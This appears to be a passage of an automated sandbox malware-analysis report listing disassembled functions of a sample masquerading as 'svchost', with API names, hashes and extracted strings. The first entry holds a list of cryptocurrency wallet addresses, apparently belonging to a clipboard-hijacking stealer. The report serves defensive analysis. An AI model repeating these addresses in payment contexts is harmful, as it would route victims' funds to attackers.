                                                                                        • String ID: 0x6f5d22258243f738460e0e4fe1f8c0fa58ce9abe$13MUDpYmziJo8zMD2743Ygch5c1ae8QiNV$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LQwgkF3f1AAZZ3WuewhRobt2h15NWfivtx$TBid7Hs8NBHCPytFMgKc3VTvzFgL5KPMbb$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                        • API String ID: 2382078925-3773165574
                                                                                        • Opcode ID: 21d35d6f7c0a6df29142ddf1a1bf3c38aef0ed986b01762a66452d2035f17931
                                                                                        • Instruction ID: db8d6779445c8ecd7099c17cff18453828783a50ab4797cb507ccd995de5b912
                                                                                        • Opcode Fuzzy Hash: 21d35d6f7c0a6df29142ddf1a1bf3c38aef0ed986b01762a66452d2035f17931
                                                                                        • Instruction Fuzzy Hash: F0427436609BC190DA71DB16F4902EAB3A5FBC8750F509136DA8EC7B69EF6CD144CB40
                                                                                        Function 00007FF60BF82058 Relevance: 13.6, APIs: 9, Instructions: 65fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$File$CreateMappingView
                                                                                        • String ID:
                                                                                        • API String ID: 1771758222-0
                                                                                        • Opcode ID: edae8342df2d6b86e2a31d811e725ecab3a5af5ba2ad6958d75b1e60dcb65b53
                                                                                        • Instruction ID: 275549857d60083c63b2e35175dff2b6cd524be8e21013c6f1dbfa6692f7179e
                                                                                        • Opcode Fuzzy Hash: edae8342df2d6b86e2a31d811e725ecab3a5af5ba2ad6958d75b1e60dcb65b53
                                                                                        • Instruction Fuzzy Hash: 9731CA36618A8192E750DB25F95472A67A0FBC8B94F209431EB8FC3B78CF7DD4558B00
                                                                                        Function 00007FF60BFA0E78 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 1083639309-0
                                                                                        • Opcode ID: 33d517ba9ed34bad332c22683f5269e417fb0aac9e56d6b41238f0337e4f5fc0
                                                                                        • Instruction ID: 251a7c8a5890bbc124882ee17fd1306eb3ddcdee7fae0917dc2d32d36a7dc6ed
                                                                                        • Opcode Fuzzy Hash: 33d517ba9ed34bad332c22683f5269e417fb0aac9e56d6b41238f0337e4f5fc0
                                                                                        • Instruction Fuzzy Hash: 60213E61A1C94292E7649F21F45432AB360FBC8795F208631E59FC36B8DF3CD5458B00
                                                                                        Function 00007FF60BFA796B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception_getptd$DestructObject$Raise_getptd_noexit
                                                                                        • String ID: csm
                                                                                        • API String ID: 2851507484-1018135373
                                                                                        • Opcode ID: 64d00ee2830e9379cd3ef173d90ae30a9ca42842e8ef135b9074179a121e00c4
                                                                                        • Instruction ID: b5357596251e138a8cca882f89432fd67cbadb218c28d12765de66494c5258eb
                                                                                        • Opcode Fuzzy Hash: 64d00ee2830e9379cd3ef173d90ae30a9ca42842e8ef135b9074179a121e00c4
                                                                                        • Instruction Fuzzy Hash: 00212C7660864582E634DF21E04076EB7A0F789BA4F148231DE9E837B5CF3CE986DB50
                                                                                        Function 00007FF60BF8C920 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: LockitLockit::_std::_$Getfacet__int64_lockstd::locale::_
                                                                                        • String ID: bad cast
                                                                                        • API String ID: 1826629674-3145022300
                                                                                        • Opcode ID: 932e2d8308b347af2fb822a83c7166a45b16841b8f045a10c064c8219c059d73
                                                                                        • Instruction ID: e21147688afd40d6297da07da4bb7f45ff77db517925f84ab2a2aa3458ce1ba8
                                                                                        • Opcode Fuzzy Hash: 932e2d8308b347af2fb822a83c7166a45b16841b8f045a10c064c8219c059d73
                                                                                        • Instruction Fuzzy Hash: AA21EC2261CA4681DA60DB15E49026AB760FBC87A4F609232FA9FC37B9DF7CD554CB40
                                                                                        Function 00007FF60BF8CA20 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: LockitLockit::_std::_$Getfacet__int64_lockstd::locale::_
                                                                                        • String ID: bad cast
                                                                                        • API String ID: 1826629674-3145022300
                                                                                        • Opcode ID: 6686d453f540abfc75b9a040e882549689efe832026ee8754cd51114fbe3f1ce
                                                                                        • Instruction ID: 04ccf25217f7c69757323af2c91bf5ef27a30c1730a5a3bc3de1fb013ce2e51b
                                                                                        • Opcode Fuzzy Hash: 6686d453f540abfc75b9a040e882549689efe832026ee8754cd51114fbe3f1ce
                                                                                        • Instruction Fuzzy Hash: 9D21FD2251CE4681DA60DB15F49026AB360FB887A4F608232FA8FC37B9DF7CD544CB00
                                                                                        Function 00007FF60BFA63C4 Relevance: 12.2, APIs: 8, Instructions: 168COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$Sleep_malloc_crtmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 2523592665-0
                                                                                        • Opcode ID: 9dc3a43cf0aa1fcfdc29037b235636b50873e9ffe005ada4d84142dea13232af
                                                                                        • Instruction ID: 14babc7c197ecbdd364da3ffdef25effc3fac56b461dc35a1291429f2d72f388
                                                                                        • Opcode Fuzzy Hash: 9dc3a43cf0aa1fcfdc29037b235636b50873e9ffe005ada4d84142dea13232af
                                                                                        • Instruction Fuzzy Hash: 1261E66270874193EB18DF16E94066933A4FB8CB94F688135DE5EC3B61DF3CE4668B00
                                                                                        Function 00007FF60BFA1D88 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 781512312-0
                                                                                        • Opcode ID: 64063577f5759fc087550664f9166848bfe9c81f154bd90bd0409ab7649f8bd4
                                                                                        • Instruction ID: d36b19231184839b7729a5d300eac4b6716eb25a52d54c668578349687e7d07b
                                                                                        • Opcode Fuzzy Hash: 64063577f5759fc087550664f9166848bfe9c81f154bd90bd0409ab7649f8bd4
                                                                                        • Instruction Fuzzy Hash: B221D8D1E1C38242FB695721918037961A0AF9D7A0F75C230E65FDB7E5CE6CEA418F00
                                                                                        Function 00007FF60BF9CD90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: _errno$AllocHeapNameUser_callnewhfreemalloc
                                                                                        • String ID:
                                                                                        • API String ID: 982591855-0
                                                                                        • Opcode ID: cadc991865815251f5f87effce6c4517c62175ad35677cb75216a9f745d246b1
                                                                                        • Instruction ID: 48cb372c88e6e832222468ab73c537623c95903d214a50c5b4e2b6be5d0ad2c5
                                                                                        • Opcode Fuzzy Hash: cadc991865815251f5f87effce6c4517c62175ad35677cb75216a9f745d246b1
                                                                                        • Instruction Fuzzy Hash: 4721647670CA4586EB109F2AE45032A73A4FBCDB84F608431EA8EC7765DF7DD8558B00
                                                                                        Function 00007FF60BF9FEC8 Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 299056699-0
                                                                                        • Opcode ID: fded58dde77be56de6fab05177e5339cc4062db6b0d45a6a30c187912645d6f3
                                                                                        • Instruction ID: 7a0bc52b40dae3b02f652f71ced4454f9f9990094b6f0d5a7555ff0f33692825
                                                                                        • Opcode Fuzzy Hash: fded58dde77be56de6fab05177e5339cc4062db6b0d45a6a30c187912645d6f3
                                                                                        • Instruction Fuzzy Hash: 70019A2691CA4292E7209F21E9682296370FBCDB59F608532F98FC7774CF3CE5A5C610
                                                                                        Function 00007FF60BF95414 Relevance: 10.7, APIs: 7, Instructions: 247COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Ucopy$Decorator::getMtx_guardMtx_guard::~_TableTypetype_info::_name_internal_method
                                                                                        • String ID:
                                                                                        • API String ID: 4074051914-0
                                                                                        • Opcode ID: f014fbc6859682eefceef7ecbbf1b7741ac91cddb56665be6d968ce3dc7cad67
                                                                                        • Instruction ID: ff69ef6379d7d78e8630cacdcd52dce4eae6e47af01490891fe9ef4fb8667698
                                                                                        • Opcode Fuzzy Hash: f014fbc6859682eefceef7ecbbf1b7741ac91cddb56665be6d968ce3dc7cad67
                                                                                        • Instruction Fuzzy Hash: C1D19266619BC985CA70DF5AE4903AAB361F7C9BC4F508026DACE87B69DF3CD444CB01
                                                                                        Function 00007FF60BF88980 Relevance: 10.6, APIs: 7, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Ucopy$Mtx_guardMtx_guard::~__aligned_msizetype_info::_name_internal_method
                                                                                        • String ID:
                                                                                        • API String ID: 1928733530-0
                                                                                        • Opcode ID: 09518546536a787895912284108b7650a63c47b0a4a23c6140e26a573662d104
                                                                                        • Instruction ID: 44927fccbcaea0c62a0d4b857b4babcd66f1ddc9bb60633f013adfe74dc53843
                                                                                        • Opcode Fuzzy Hash: 09518546536a787895912284108b7650a63c47b0a4a23c6140e26a573662d104
                                                                                        • Instruction Fuzzy Hash: 2E718026618B85C2DA50DB1AE49025EA7A0F7C8BD4F205126EBCE83B79DF3CD441CF00
                                                                                        Function 00007FF60BF88C60 Relevance: 10.6, APIs: 7, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Ucopy$Mtx_guardMtx_guard::~__aligned_msizetype_info::_name_internal_method
                                                                                        • String ID:
                                                                                        • API String ID: 1928733530-0
                                                                                        • Opcode ID: 4325eb878f5f8b404332b1c80043bf9b581a45e85f0c9479c12b2f4d25b8355e
                                                                                        • Instruction ID: 04fa3a46f1ede2394efae16768e93d8a8691aa6895032691dfc9e94a1f4e4575
                                                                                        • Opcode Fuzzy Hash: 4325eb878f5f8b404332b1c80043bf9b581a45e85f0c9479c12b2f4d25b8355e
                                                                                        • Instruction Fuzzy Hash: 72718026619B8582DA50DB5AE49025EA7A0F7C8BD4F605126EBCE83B79DF7CD441CF00
                                                                                        Function 00007FF60BFAF30C Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 1573762532-0
                                                                                        • Opcode ID: a13fad1822833028ca0eb10c8db0b597438e1cbbeed43b07fa581a08987f042d
                                                                                        • Instruction ID: 5a1e3c2095377b3f8d2182d790fbb8f014a24a7feb102c1658faac0b29c23bfd
                                                                                        • Opcode Fuzzy Hash: a13fad1822833028ca0eb10c8db0b597438e1cbbeed43b07fa581a08987f042d
                                                                                        • Instruction Fuzzy Hash: B14138E6E1839281EF6CAB1195801B972A0FF48794FA4C131DE8ECB6E5DF2CE4508B00
                                                                                        Function 00007FF60BFA3424 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 781512312-0
                                                                                        • Opcode ID: 9ed3336eb9426492d7b9aa9cf18bd71b667003e75d89d3dfa61ab95dda06c464
                                                                                        • Instruction ID: f820444080828d4331fa76b2eeaed723c380fede9ccd19f83d33a6b270da7b74
                                                                                        • Opcode Fuzzy Hash: 9ed3336eb9426492d7b9aa9cf18bd71b667003e75d89d3dfa61ab95dda06c464
                                                                                        • Instruction Fuzzy Hash: EB412FE2E182A345EB689B1591401B972A0EF58BA0FA4C135EB9FC76D4DF2CE551CF04
                                                                                        Function 00007FF60BFA0D0C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                        • String ID: %08lX%04lX%lu$C$\
                                                                                        • API String ID: 3001812590-4231652159
                                                                                        • Opcode ID: 7bd2a999512e55fdd9f8ee897116d2d3bdff1adfd49b806867a6735701cc4331
                                                                                        • Instruction ID: c669231f539d470108ec06ee516b9e3267b0911fe3df22f89893302e57c59813
                                                                                        • Opcode Fuzzy Hash: 7bd2a999512e55fdd9f8ee897116d2d3bdff1adfd49b806867a6735701cc4331
                                                                                        • Instruction Fuzzy Hash: C1311B7260C68186E7158B68F4543AABBA0E7CA704F644135E78EC7BA9DF7ED944CF00
                                                                                        Function 00007FF60BFA7A68 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: _getptd
                                                                                        • String ID: MOC$RCC$csm
                                                                                        • API String ID: 3186804695-2671469338
                                                                                        • Opcode ID: 8894c65672d227fda39ec56e5dcad6079c82dd72da27f0faa52aa83d8d89759d
                                                                                        • Instruction ID: cafc45187577947f2301ea9a5a4d70ecf034121bd3006032a56732babd5c833e
                                                                                        • Opcode Fuzzy Hash: 8894c65672d227fda39ec56e5dcad6079c82dd72da27f0faa52aa83d8d89759d
                                                                                        • Instruction Fuzzy Hash: 18F0F8B5918106E9E6692BA580057BC7190EFAC706FA5D471C20AC33B29FAC79818F12
                                                                                        Function 00007FF60BF9C9D0 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 102sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
